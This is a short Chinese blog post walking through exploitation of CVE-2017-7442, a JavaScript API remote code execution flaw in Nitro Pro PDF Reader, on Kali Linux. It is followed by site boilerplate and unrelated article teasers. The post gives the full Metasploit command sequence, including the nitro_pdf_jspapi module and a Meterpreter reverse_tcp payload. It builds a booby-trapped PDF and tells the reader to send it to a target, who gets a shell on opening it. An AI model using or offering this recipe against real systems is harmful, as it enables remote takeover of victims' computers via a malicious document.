kali下CVE_2017_7442利用实验

参考：https://www.exploit-db.com/exploits/42418/
https://www.youtube.com/watch?v=EhW9GhLF_Ww

Nitro Pro PDF Reader 11.0.3.173 Javascript API远程执行代码

msfconsole
search nitro_pdf
use exploit/windows/fileformat/nitro_pdf_jspapi
set payload windows/meterpreter/reverse_tcp
set lhost 本机IP
set lport 本机端口
set FILENAME test.pdf
exploit
将生成的pdf文件cp出来，发给目标机。
前提是，目标机安装了https://www.gonitro.com
打开pdf以后，自动获得目标shell

最后编辑于：2017.12.10 00:29:02

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成，浏览时请结合常识与多方信息审慎甄别。
平台声明：文章内容（如有图片或视频亦包括在内）由作者上传并发布，文章内容仅代表作者本人观点，简书系信息发布平台，仅提供信息存储服务。

相关阅读更多精彩内容

6.26
一种撕裂的感觉早上起来眼睛完全睁不开，不能想象睡着之前经历了什么我一遍又一遍按亮手机，没有没有还是没有痛苦到极点
青衫不华阅读 1,652评论 0赞 0
皑皑白雪，情深不寿：电影里那些美到哭的雪景！
最近气温又上升的北方城市，让小编再次感受了夏天有多烦！我和烤肉的区别，大概真的只差一把孜然吧！此刻小编，非常怀念冬...
面瘫的小胖子阅读 5,238评论 1赞 3

在吃上达到奢侈的极致，是一种什么状态
记得日本国的诗人芭蕉写过一句诗:“新叶滴翠，摘来拂拭尊师泪”。讲的是鉴真和尚想念中土故地，伤心流泪的事。日本这个...
杜caca阅读 3,957评论 0赞 4
无标题文章
11111111111111111111111111111111111111
78b3ba8110d0阅读 1,265评论 0赞 0
朋友，若能棋逢对手，何须门户相当
门户不相当，贫富有差异，成长经历，消费观念，难免就会有所不同，还能愉快的做朋友吗？当然能。高山流水传唱千古，说...
刺猬的树洞阅读 5,423评论 6赞 15

友情链接更多精彩内容

赞1赞

赞赏

手机看全文